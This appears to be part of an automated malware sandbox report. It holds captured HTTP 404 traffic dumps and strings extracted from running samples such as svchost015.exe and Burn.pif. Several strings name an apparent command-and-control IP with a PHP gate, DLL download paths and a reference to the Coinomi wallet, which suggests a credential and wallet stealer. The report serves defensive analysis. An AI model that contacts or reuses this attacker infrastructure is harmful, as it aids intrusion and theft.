Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 01 Sep 2024 16:28:06 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 01 Sep 2024 16:28:06 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 01 Sep 2024 16:28:08 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 01 Sep 2024 16:29:18 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 01 Sep 2024 16:29:26 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 01 Sep 2024 16:29:33 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 01 Sep 2024 16:29:40 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 01 Sep 2024 16:29:47 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 01 Sep 2024 16:29:57 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 01 Sep 2024 16:30:05 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 01 Sep 2024 16:30:11 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 01 Sep 2024 16:30:18 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 01 Sep 2024 16:30:24 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 01 Sep 2024 16:30:30 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 01 Sep 2024 16:30:36 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 01 Sep 2024 16:30:43 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 01 Sep 2024 16:30:48 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 01 Sep 2024 16:30:55 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Source: svchost015.exe, 0000001D.00000002.2614164343.000000000043C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.158
Source: svchost015.exe, 0000001D.00000002.2618548795.00000000009FE000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 0000001D.00000002.2618548795.0000000000A40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.158/
Source: svchost015.exe, 0000001D.00000002.2618548795.0000000000A40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.158/3836fd5700214436/freebl3.dll
Source: svchost015.exe, 0000001D.00000002.2618548795.0000000000A40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.158/3836fd5700214436/mozglue.dll
Source: svchost015.exe, 0000001D.00000002.2618548795.0000000000A40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.158/3836fd5700214436/msvcp140.dll
Source: svchost015.exe, 0000001D.00000002.2618548795.0000000000A40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.158/3836fd5700214436/msvcp140.dllj
Source: svchost015.exe, 0000001D.00000002.2618548795.0000000000AD6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.158/3836fd5700214436/nss3.dll
Source: svchost015.exe, 0000001D.00000002.2618548795.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.158/3836fd5700214436/nss3.dll%
Source: svchost015.exe, 0000001D.00000002.2618548795.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.158/3836fd5700214436/nss3.dll:
Source: svchost015.exe, 0000001D.00000002.2618548795.0000000000AD6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.158/3836fd5700214436/nss3.dllA5
Source: svchost015.exe, 0000001D.00000002.2618548795.0000000000A40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.158/3836fd5700214436/softokn3.dll
Source: svchost015.exe, 0000001D.00000002.2618548795.0000000000A40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.158/3836fd5700214436/softokn3.dllR
Source: svchost015.exe, 0000001D.00000002.2618548795.0000000000A40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.158/3836fd5700214436/sqlite3.dll
Source: svchost015.exe, 0000001D.00000002.2618548795.0000000000A5D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.158/3836fd5700214436/vcruntime140.dll
Source: svchost015.exe, 0000001D.00000002.2618548795.00000000009FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.158/7
Source: svchost015.exe, 0000001D.00000002.2618548795.0000000000A40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.158/E
Source: svchost015.exe, 0000001D.00000002.2618548795.0000000000A40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.158/e96ea2db21fa9a1b.php
Source: svchost015.exe, 0000001D.00000002.2618548795.0000000000A40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.158/e96ea2db21fa9a1b.php#
Source: svchost015.exe, 0000001D.00000002.2618548795.0000000000AD6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.158/e96ea2db21fa9a1b.php-fulluser-l1-1-0
Source: svchost015.exe, 0000001D.00000002.2618548795.0000000000AD6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.158/e96ea2db21fa9a1b.php.dll
Source: svchost015.exe, 0000001D.00000002.2618548795.0000000000A40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.158/e96ea2db21fa9a1b.php3
Source: svchost015.exe, 0000001D.00000002.2618548795.0000000000A40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.158/e96ea2db21fa9a1b.php7
Source: svchost015.exe, 0000001D.00000002.2618548795.0000000000A40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.158/e96ea2db21fa9a1b.php?
Source: svchost015.exe, 0000001D.00000002.2618548795.0000000000AD6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.158/e96ea2db21fa9a1b.php?0
Source: svchost015.exe, 0000001D.00000002.2618548795.0000000000A5D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.158/e96ea2db21fa9a1b.phpCoinomi
Source: svchost015.exe, 0000001D.00000002.2618548795.0000000000A40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.158/e96ea2db21fa9a1b.phpK
Source: svchost015.exe, 0000001D.00000002.2618548795.0000000000AD6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.158/e96ea2db21fa9a1b.phpK0
Source: svchost015.exe, 0000001D.00000002.2618548795.0000000000AD6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.158/e96ea2db21fa9a1b.phpN=
Source: svchost015.exe, 0000001D.00000002.2618548795.0000000000A40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.158/e96ea2db21fa9a1b.phpg
Source: svchost015.exe, 0000001D.00000002.2618548795.0000000000AD6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.158/e96ea2db21fa9a1b.phpg0
Source: svchost015.exe, 0000001D.00000002.2618548795.0000000000A40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.158/e96ea2db21fa9a1b.phpo
Source: svchost015.exe, 0000001D.00000002.2618548795.0000000000A5D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.158/e96ea2db21fa9a1b.phpser
Source: svchost015.exe, 0000001D.00000002.2614164343.00000000005AD000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.158/e96ea2db21fa9a1b.phption:
Source: svchost015.exe, 0000001D.00000002.2618548795.0000000000AD6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.158/e96ea2db21fa9a1b.php~0
Source: svchost015.exe, 0000001D.00000002.2614164343.00000000005AD000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.158IIEH
Source: freebl3.dll.29.dr, softokn3.dll.29.dr, nss3.dll.29.dr, nss3[1].dll.29.dr, mozglue[1].dll.29.dr, mozglue.dll.29.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: freebl3.dll.29.dr, softokn3.dll.29.dr, nss3.dll.29.dr, nss3[1].dll.29.dr, mozglue[1].dll.29.dr, mozglue.dll.29.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: explorer.exe, 00000001.00000000.1703368759.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1704715234.000000000982D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: freebl3.dll.29.dr, softokn3.dll.29.dr, nss3.dll.29.dr, nss3[1].dll.29.dr, mozglue[1].dll.29.dr, mozglue.dll.29.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: freebl3.dll.29.dr, softokn3.dll.29.dr, nss3.dll.29.dr, nss3[1].dll.29.dr, mozglue[1].dll.29.dr, mozglue.dll.29.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: freebl3.dll.29.dr, softokn3.dll.29.dr, nss3.dll.29.dr, nss3[1].dll.29.dr, mozglue[1].dll.29.dr, mozglue.dll.29.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: DFA6.exe, 0000001A.00000002.2426601330.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe.26.dr	String found in binary or memory: http://cert.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.cer0Q
Source: Burn.pif, 00000011.00000003.2227175462.0000000003C5B000.00000004.00000800.00020000.00000000.sdmp, Burn.pif, 00000011.00000003.2924741596.000000000350A000.00000004.00000020.00020000.00000000.sdmp, SwiftServe.scr.17.dr, Dod.7.dr, Burn.pif.8.dr	String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: Burn.pif, 00000011.00000003.2227175462.0000000003C5B000.00000004.00000800.00020000.00000000.sdmp, Burn.pif, 00000011.00000003.2924741596.000000000350A000.00000004.00000020.00020000.00000000.sdmp, SwiftServe.scr.17.dr, Dod.7.dr, Burn.pif.8.dr	String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: Burn.pif, 00000011.00000003.2227175462.0000000003C5B000.00000004.00000800.00020000.00000000.sdmp, Burn.pif, 00000011.00000003.2924741596.000000000350A000.00000004.00000020.00020000.00000000.sdmp, SwiftServe.scr.17.dr, Dod.7.dr, Burn.pif.8.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: Burn.pif, 00000011.00000003.2227175462.0000000003C5B000.00000004.00000800.00020000.00000000.sdmp, Burn.pif, 00000011.00000003.2924741596.000000000350A000.00000004.00000020.00020000.00000000.sdmp, SwiftServe.scr.17.dr, Dod.7.dr, Burn.pif.8.dr	String found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: DFA6.exe, 0000001A.00000002.2426601330.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe.26.dr	String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: freebl3.dll.29.dr, softokn3.dll.29.dr, nss3.dll.29.dr, nss3[1].dll.29.dr, mozglue[1].dll.29.dr, mozglue.dll.29.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: freebl3.dll.29.dr, softokn3.dll.29.dr, nss3.dll.29.dr, nss3[1].dll.29.dr, mozglue[1].dll.29.dr, mozglue.dll.29.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: freebl3.dll.29.dr, softokn3.dll.29.dr, nss3.dll.29.dr, nss3[1].dll.29.dr, mozglue[1].dll.29.dr, mozglue.dll.29.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: explorer.exe, 00000001.00000000.1703368759.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1704715234.000000000982D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: freebl3.dll.29.dr, softokn3.dll.29.dr, nss3.dll.29.dr, nss3[1].dll.29.dr, mozglue[1].dll.29.dr, mozglue.dll.29.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: freebl3.dll.29.dr, softokn3.dll.29.dr, nss3.dll.29.dr, nss3[1].dll.29.dr, mozglue[1].dll.29.dr, mozglue.dll.29.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: freebl3.dll.29.dr, softokn3.dll.29.dr, nss3.dll.29.dr, nss3[1].dll.29.dr, mozglue[1].dll.29.dr, mozglue.dll.29.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: freebl3.dll.29.dr, softokn3.dll.29.dr, nss3.dll.29.dr, nss3[1].dll.29.dr, mozglue[1].dll.29.dr, mozglue.dll.29.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: freebl3.dll.29.dr, softokn3.dll.29.dr, nss3.dll.29.dr, nss3[1].dll.29.dr, mozglue[1].dll.29.dr, mozglue.dll.29.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: explorer.exe, 00000001.00000000.1703368759.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1704715234.000000000982D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: freebl3.dll.29.dr, softokn3.dll.29.dr, nss3.dll.29.dr, nss3[1].dll.29.dr, mozglue[1].dll.29.dr, mozglue.dll.29.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: DFA6.exe, 0000001A.00000002.2426601330.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe.26.dr	String found in binary or memory: http://crls.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.crl0
Source: DFA6.exe, 0000001A.00000002.2426601330.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe.26.dr	String found in binary or memory: http://crls.ssl.com/ssl.com-rsa-RootCA.crl0
Source: DFA6.exe, 0000001A.00000002.2426601330.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe.26.dr	String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: RegAsm.exe, 0000001F.00000002.4105752238.000000000092E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: RegAsm.exe, 0000001F.00000002.4105752238.000000000092E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: 329C.exe, 00000007.00000002.2197214813.0000000000408000.00000002.00000001.01000000.00000006.sdmp, 329C.exe, 00000007.00000002.2197633579.0000000000873000.00000002.00000001.01000000.00000006.sdmp, 329C.exe, 00000007.00000000.2189914401.0000000000408000.00000002.00000001.01000000.00000006.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: explorer.exe, 00000001.00000000.1703368759.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1704715234.000000000982D000.00000004.00000001.00020000.00000000.sdmp, freebl3.dll.29.dr, softokn3.dll.29.dr, nss3.dll.29.dr, nss3[1].dll.29.dr, mozglue[1].dll.29.dr, mozglue.dll.29.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: freebl3.dll.29.dr, softokn3.dll.29.dr, nss3.dll.29.dr, nss3[1].dll.29.dr, mozglue[1].dll.29.dr, mozglue.dll.29.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: freebl3.dll.29.dr, softokn3.dll.29.dr, nss3.dll.29.dr, nss3[1].dll.29.dr, mozglue[1].dll.29.dr, mozglue.dll.29.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: freebl3.dll.29.dr, softokn3.dll.29.dr, nss3.dll.29.dr, nss3[1].dll.29.dr, mozglue[1].dll.29.dr, mozglue.dll.29.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: freebl3.dll.29.dr, softokn3.dll.29.dr, nss3.dll.29.dr, nss3[1].dll.29.dr, mozglue[1].dll.29.dr, mozglue.dll.29.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: explorer.exe, 00000001.00000000.1703368759.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: DFA6.exe, 0000001A.00000002.2426601330.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe.26.dr	String found in binary or memory: http://ocsp.sectigo.com0
Source: Burn.pif, 00000011.00000003.2227175462.0000000003C5B000.00000004.00000800.00020000.00000000.sdmp, Burn.pif, 00000011.00000003.2924741596.000000000350A000.00000004.00000020.00020000.00000000.sdmp, SwiftServe.scr.17.dr, Dod.7.dr, Burn.pif.8.dr	String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: Burn.pif, 00000011.00000003.2227175462.0000000003C5B000.00000004.00000800.00020000.00000000.sdmp, Burn.pif, 00000011.00000003.2924741596.000000000350A000.00000004.00000020.00020000.00000000.sdmp, SwiftServe.scr.17.dr, Dod.7.dr, Burn.pif.8.dr	String found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: Burn.pif, 00000011.00000003.2227175462.0000000003C5B000.00000004.00000800.00020000.00000000.sdmp, Burn.pif, 00000011.00000003.2924741596.000000000350A000.00000004.00000020.00020000.00000000.sdmp, SwiftServe.scr.17.dr, Dod.7.dr, Burn.pif.8.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: DFA6.exe, 0000001A.00000002.2426601330.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe.26.dr	String found in binary or memory: http://ocsps.ssl.com0
Source: explorer.exe, 00000001.00000000.1704715234.000000000982D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.mi
Source: explorer.exe, 00000001.00000000.1704715234.000000000982D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.micr
Source: explorer.exe, 00000001.00000000.1703982523.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1705430014.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1704330354.0000000008720000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: RegAsm.exe, 0000001F.00000002.4107921007.0000000002494000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.4107921007.00000000028D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Burn.pif, 00000011.00000003.2227175462.0000000003C5B000.00000004.00000800.00020000.00000000.sdmp, Burn.pif, 00000011.00000003.2924741596.000000000350A000.00000004.00000020.00020000.00000000.sdmp, SwiftServe.scr.17.dr, Dod.7.dr, Burn.pif.8.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: Burn.pif, 00000011.00000003.2227175462.0000000003C5B000.00000004.00000800.00020000.00000000.sdmp, Burn.pif, 00000011.00000003.2924741596.000000000350A000.00000004.00000020.00020000.00000000.sdmp, SwiftServe.scr.17.dr, Dod.7.dr, Burn.pif.8.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: Burn.pif, 00000011.00000000.2216560100.00000000006E9000.00000002.00000001.01000000.00000007.sdmp, Burn.pif, 00000011.00000003.2227175462.0000000003C5B000.00000004.00000800.00020000.00000000.sdmp, SwiftServe.scr, 00000019.00000000.2241141842.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmp, SwiftServe.scr, 0000001C.00000002.2435797757.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmp, SwiftServe.scr.17.dr, Dod.7.dr, Burn.pif.8.dr	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: freebl3.dll.29.dr, softokn3.dll.29.dr, nss3.dll.29.dr, nss3[1].dll.29.dr, mozglue[1].dll.29.dr, mozglue.dll.29.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: svchost015.exe, svchost015.exe, 0000001D.00000002.2675141656.000000006C8AD000.00000002.00000001.01000000.0000000F.sdmp, mozglue[1].dll.29.dr, mozglue.dll.29.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: svchost015.exe, 0000001D.00000002.2647841701.000000001AD9A000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 0000001D.00000002.2672949508.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
